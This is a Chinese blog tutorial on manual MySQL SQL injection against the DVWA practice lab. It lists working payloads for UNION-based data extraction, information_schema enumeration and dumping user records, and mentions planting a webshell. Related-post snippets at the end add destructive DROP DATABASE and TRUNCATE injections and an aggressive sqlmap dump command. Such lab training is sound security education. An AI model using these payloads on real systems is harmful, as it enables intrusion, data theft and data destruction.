SQL注入之DVWA平台测试mysql注入

最新推荐文章于 2025-07-11 18:58:51 发布
最新推荐文章于 2025-07-11 18:58:51 发布
阅读量1.7k 收藏 3
点赞数 1
分类专栏: PHP 文章标签: SQL注入
本文通过DVWA平台演示了针对MySQL数据库的SQL注入攻击测试过程,包括寻找注入点、获取数据库信息、猜解表名及字段名等内容。
今天主要针对mysql常用注入语句进行测试。

测试环境与工具:

测试平台:DVWA,下载地址:http://www.2cto.com/soft/201303/38043.html,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。

渗透工具burpsuite-1.4.07:下载地址:http://www.2cto.com/soft/201211/35515.html

    首先我们介绍下DVWA和Burpsuite,DVWA这是一个php+mysql平台构建的预置web常见漏洞的渗透练习平台。能够帮助web应用安全研究人员很好了解web漏洞。Burpsuite是一款功能强大的web渗透测试工具。

    SQL注入漏洞在OWASP TOP 10威胁中,一直排名第一,安全威胁可见一斑。SQL注入渗透测试过程中,针对不同的数据库平台,注入语句选择也不同,本篇笔者主要测试mysql注入的常用语句以及渗透思路。

 

登录访问DVWA,默认用户名:admin密码:password.

加载中...

登录之后,将dvwa的安全级别调成low,low代表安全级别最低,存在较容易测试的漏洞。加载中...

1、找到SQl Injection 选项,测试是否存在注入点,这里用户交互的地方为表单,这也是常见的SQL注入漏洞存在的地方。正常测试,输入1,可以得到如下结果

加载中...


当将输入变为“'”时,页面提示错误“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1”,结果如图。看到这个结果,我们可以欣慰的知道,这个表单存在着注入漏洞。加载中...

加载中...

2、尝试遍历数据库表,由于用户输入的值为ID,因此我们习惯判断这里的注入类型为数字型,因此尝试输入:1 or 1=1 ,看能否把数据库表中的内容遍历出来。可是结果如下,并没有显示出所有信息

加载中...

于是猜测,是否后台应用程序将此值看做了字符型,于是输入:1'or'1'='1,结果,遍历出了数据库中的所有内容,如果是重要数据库表,可能这个信息已经对于攻击者,有了足够意义:如图

1'or'1'='1

加载中...

 

3、测试查询信息列数。利用语句order by num 

这里我们输入 " 1'order by 1 -- " 结果页面正常显示,注意-- 后面有空格。继续测试," 1'order by 2 -- "," 1'order by 3 -- ",当输入3是,页面报错。页面错误信息如下,Unknown column '3' in 'order clause',由此我们判断查询结果值为2列。

1'order by 1 --

1'order by 3 --

 
加载中...

  Unknown column '3' in 'order clause'

4、通过得到连接数据库账户信息、数据库名称、数据库版本信息。利用user(),及database(),version()等三个内置函数。

这里尝试注入 “1' and 1=2 union select 1,2 -- ”结果如下

1' and 1=2 union select 1,2 -- 

加载中...

从而得出First name处显示结果为查询结果第一列的值,surname处显示结果为查询结果第二列的值,利用内置函数user(),及database(),version()注入得出连接数据库用户以及数据库名称:

1' and 1=2 union select user(),database()  -- 

加载中...

连接数据库的用户为root@localhost,数据库名称为dvwa,进一步利用函数version(),尝试得到版本信息,“1' and 1=2 union select version(),database()  -- ”便得到了版本信息,

1' and 1=2 union select version(),database()  -- 加载中...

5、获得操作系统信息。


1'and 1=2 union select 1,@@global.version_compile_os from mysql.user --

加载中...

6、测试连接数据库权限:


 1' and ord(mid(user(),1,1))=114 --

加载中...

7、查询mysql数据库,所有数据库名字:这里利用mysql默认的数据库infromation_scehma,该数据库存储了Mysql所有数据库和表的信息。


1' and 1=2 union select 1,schema_name from information_schema.schemata --
加载中...

8、猜解dvwa数据库中的表名。利用1‘ and exists(select * from 表名),此处表名猜解可以通过brupsuit挂字典猜解。这里测试的结果,表名为users,burpsuite如何自动注入,在稍后文章进一步介绍。这里猜解表名,在真实渗透测试环境中,攻击者往往关心存储管理员用户与密码信息的表。

1' and exists(select * from users) --

加载中...

 

9、猜解字段名:1' and exists(select 表名 from users) -- ,这里测试的字段名有first_name,last_name


1' and exists(select first_name from users) -- 

ID: 1' and exists(select last_name from users) --

加载中...

加载中...

10、爆出数据库中字段的内容 1' and 1=2 union select first_name,last_name from users -- ,这里其实如果是存放管理员账户的表,那么用户名,密码信息字段就可以爆出来了。

加载中...

以上是笔者根据dvwa平台sql injection漏洞对mysql常用语句所做的测试。这里我们可以大致总结渗透的一般思路:

1、寻找注入点,可以通过web扫描工具实现

2、通过注入点,尝试获得关于连接数据库用户名、数据库名称、连接数据库用户权限、操作系统信息、数据库版本等相关信息。

3、猜解关键数据库表及其重要字段与内容(常见如存放管理员账户的表名、字段名等信息)

4、可以通过获得的用户信息,寻找后台登录。

5、利用后台或了解的进一步信息,上传webshell或向数据库写入一句话木马,以进一步提权,直到拿到服务器权限。

今天笔者只在dvwa平台现有环境下,简单测试了mysql几个常用注入语句:

1' order by 2 --   /*用来猜解查询信息的列数

1' and 1=2 union select user(),database(),-- 

1' and 1=2 union select user(),version(), -- /*利用user(),database(),version()函数获得数据库信息

1'and 1=2 union select 1,@@global.version_compile_os from mysql.user -- /*获得操作系统信息1' and ord(mid(user(),1,1))=114 --  /*测试连接数据库用户权限

1' and 1=2 union select 1,schema_name from information_schema.schemata -- /*爆出所有数据库名称1' and exists(select * from users) -- /*猜解表名

1' and exists(select first_name from users) -- /猜解字段名

1' and 1=2 union select first_name,last_name from users -- /*猜解字段内容

 

关于mysql注入测试,就简单介绍到这里,如有错误,欢迎指正。关于brupsuite如何自动注入,将在其他篇章介绍

DVWA平台Sql注入
林林木林林L的博客
03-10 524
Sql注入模块 输入一个数字,然后submit F12查看Cookies 打开sqlmap,输入命令,查看数据库 查表 查表里数据 查看字段的数据 Sql手工注入 上面用的是sqlmap获取数据库信息,现在使用手工注入来获取数据库的信息。 思路: 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 ...
DVWA--SQL注入
xiaoxiao的博客
01-07 3543
SQL注入原理 就是通过sql命令插入到web表单递交或输入域名页面请求的查询字符串,最终达到欺骗服务器执行恶意的SDL命令。具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在WEB表单中输入恶意SQL语句得到包含漏洞的网站数据库,而不是按照设计者意图去执行。 SQL注入类型 按照数据提交的方式: GET注入、POST注入、COOKIE注入、HTTP头部...
DVWA-LOW级-SQL手工注入漏洞测试(布尔盲注)+sqlmap自动化注入-小白必看(超详细)
最新发布
kitiu666的博客
07-11 848
上次我们进行了sql注入的靶场练习,通过在输入框输入恶意的sql指令使后台数据库执行,并把结果回显到前端。这次我们继续学习另一种sql注入方式,布尔盲注,首先我们需要先去了解什么是布尔盲注,又是通过这样的方式得到我们想要得到的信息。其大概意思就是说,假如我们想要得到我们想要获得的信息,只能通过输入指令后观察页面给我们回显的信息或者页面是否有报错等判断我们输入的指令是否正确,可能看到这有人还会一头雾水,觉得很抽象,那么我们直接进行实战解说;
mysql注入dvwa_DVWASQL注入测试入门
weixin_39517199的博客
02-02 274
目的通过使用DVWA实例理解PHP中SQL注入漏洞产生的原理及利用方法,结合实例掌握其过滤方式。原理SQL注入:在用户的输入没有被转义字符过滤时。就会发生这种形式的注入式攻击,它会传递给数据库一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有...
DVWA亲测sql注入漏洞
shuicarry66的博客
12-11 581
LOW等级我们先输入1我们加上一个单引号,页面报错我们看一下源代码:我们看id也没有进行过滤。。。。我们可以尝试闭合单引号比如我们输入id=1' or '1'='1原句就变成:下面是如何来利用sql注入文件读取写入一句话木马或者用sqlmap自动化注入:sqlmap成功注入sqlmap获取webshell:Medium等级我们先尝试来抓包:然后尝试修改id参数,Go向前观察页面变化后面的利用跟LOW等级一样,这里不再赘述。
DVWA下的SQL注入
07-25
SQL
SQL注入DVWA靶场SQL注入实践
weixin_40433003的博客
01-23 1450
接下来,对于数据库5.0以上的版本,存在information_schema表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表等信息;如上图所示,可以看到我们获得了关键字段:user和password,因此我们接着使用如下语句进行注入。(3)确定回显位置为第二个位置(查询结果显示在原始查询返回的第二列的位置)firefox自带插件,但是遇到收费版本,需要引入一个文件(进行过滤,即攻击者可以对数据库进行操作。当输入1,回显正常,确认存在sql注入。,返回错误,说明页面没有对。
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1556
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA通过攻略之SQL注入
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
sql手工注入dvwa初级靶场
太阳照耀我走四方
02-13 1929
sql手工注入dvwa靶场
DVWA进行SQL注入
Jo_kong的博客
10-02 4875
我用的是在VMware下的虚拟机,在这就不说安装kali和win7了,各位自己去网上找一下大神们的教程,就很容易安装了。(统一说明:为了安全性等各方面考虑,下载软件最好到各大软件的官网上去下载)我用的系统如下: kali:192.168.0.183 进行SQL注入 win7:192.168.0.184 搭建dvwa环境 dvwa使用PHP写的,所以首先需要搭建web运行环境,我这里使用...
DVWA系列】——SQL注入(布尔盲注)详细教程
2402_84408069的博客
07-10 1112
本文详细介绍了DVWA SQL布尔盲注(Blind SQL Injection)在Low级别的实战方法。通过分析漏洞原理,展示了手工注入的核心步骤:判断注入类型、猜解数据库名长度、逐字符猜解数据库名、表名及列名数据。文章提供了详细Payload和二分法等高效技巧,同时推荐使用sqlmap等工具加速渗透测试。最后强调了防御措施的重要性,包括参数化查询和输入过滤。附有免责声明,强调仅限合法授权下的安全研究。
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 2637
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
DVWA mysql 注入( low)
m0_65096687的博客
10-24 326
mysql注入的原理简单来说就是将页面的语句闭合掉,然后输入自己想执行的语句,语句会通过数据库进行查询,然后返回到页面low看传入的参数id是由 ' 包裹着,所以我们需要使用 ' 将第一个单引号给注释点,然后传入我们想要查询的语句,最后将第三个单引号给注释,来使数据库成功执行我们的查询语句。这个地方困扰了我好久输入' 会报错,因为没有闭合。所以判断出他是' 闭合的字符类型注入,我们只需要注释' 即可。正确的做法是。
DVWA靶场进行SQL注入————(LOW)
weixin_51334173的博客
04-06 2701
当Web应用程序未正确过滤用户输入,直接将输入拼接到SQL查询语句中时,攻击者可以构造恶意输入,篡改原始SQL逻辑,从而执行非预期的数据库操作(如窃取数据、删除表、绕过登录等)。
SQL联合查询注入
cooorgi的博客
04-27 1127
一般利用英文**单引号(')双引号(")**来判断是否存在漏洞,如果出现SQL语句错误说明有很大的可能会存在漏洞。能会存在漏洞。比如某网站的URL为http://192.168.234.128/DVWA/vulnerabilities/sqli/?此时服务器就会从users表中把满足user_id=1这个条件的行(记录)的first_name, last_name查询出来。
DVWA-SQL注入
qq_60848021的博客
06-25 1326
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DvwaSQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1161
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
dvwasql注入学习(不同级别)
热门推荐
过客璇璇的博客
03-24 4万+
dvwasql注入学习(不同级别) 级别:Low 从页面上看到,有一个可以提交查询内容的地方 我们可以通过以下步骤判断这里是否存在注入点 ① 输入1 提交 ②输入1' 提交 ③输入1 and 1=1提交 ④输入1 and 1=2提交 由上可以看出是存在注入点的, 我们猜测sql查询语句是这样的: select First name的列名 a...
sql注入dvwamysql数据库
05-22
### 删除DVWA中的MySQL数据库数据 在处理SQL注入攻击时,删除整个数据库的操作是非常危险的行为。通常情况下,这种操作仅用于学习环境下的实验目的,在实际生产环境中绝对不建议执行此类操作。 要通过SQL注入删除`dvwa`数据库中的所有数据,可以按照以下方法实现: #### 方法一:使用 `DROP DATABASE` 命令 如果权限允许,可以通过 SQL 注入发送 `DROP DATABASE dvwa;` 的指令来完全移除该数据库及其所有内容[^1]。然而需要注意的是,大多数 Web 应用程序会限制用户的权限,使得无法直接运行此命令。以下是可能的注入语句形式: ```sql '; DROP DATABASE dvwa; -- ``` #### 方法二:逐表清空数据 更常见的情况是,即使不能直接删除整个数据库,也可以逐一清除其中的数据表。假设已经获得了目标数据库内的表格名称列表,则可通过如下方式分别清理每张表的内容: ```sql DELETE FROM table_name; TRUNCATE TABLE table_name; ``` 对于多个表而言,可构造批量请求完成这一过程。例如,假如已知存在两个表分别为 users 和 orders ,则对应的注入字符串可能是这样的结构: ```sql '; DELETE FROM users; DELETE FROM orders; -- ``` 或者采用更为简洁的方式一次性清空指定范围内的所有表项(需注意语法兼容性): ```sql '; TRUNCATE TABLE users; TRUNCATE TABLE orders; -- ``` #### 自动化工具辅助 为了简化手动构建复杂查询的过程,还可以借助像 SqlMap 这样的自动化渗透测试工具来进行高级别的控制与管理。比如之前提到过的例子中增加了参数选项 `-D dvwa --tables` 来列举具体有哪些可用表之后,再进一步扩展成破坏性的动作前务必确认清楚后果并做好充分准备以防误伤其他重要资源。 最后提醒一点非常重要——以上所有的讨论都建立在一个前提之上即拥有足够的合法授权去针对特定实例实施这些行动;否则非法入侵他人服务器属于违法行为! ```bash sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="PHPSESSID=rcs60b05f67h1qk27rm2tn1l8f; security=low" \ -D dvwa --dump-all --risk=3 --level=5 --random-agent --tamper=between.py --batch ``` 上述脚本展示了如何利用Sqlmap枚举出更多潜在敏感信息的同时也提高了探测强度等级以便发现隐藏更深的安全隐患[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值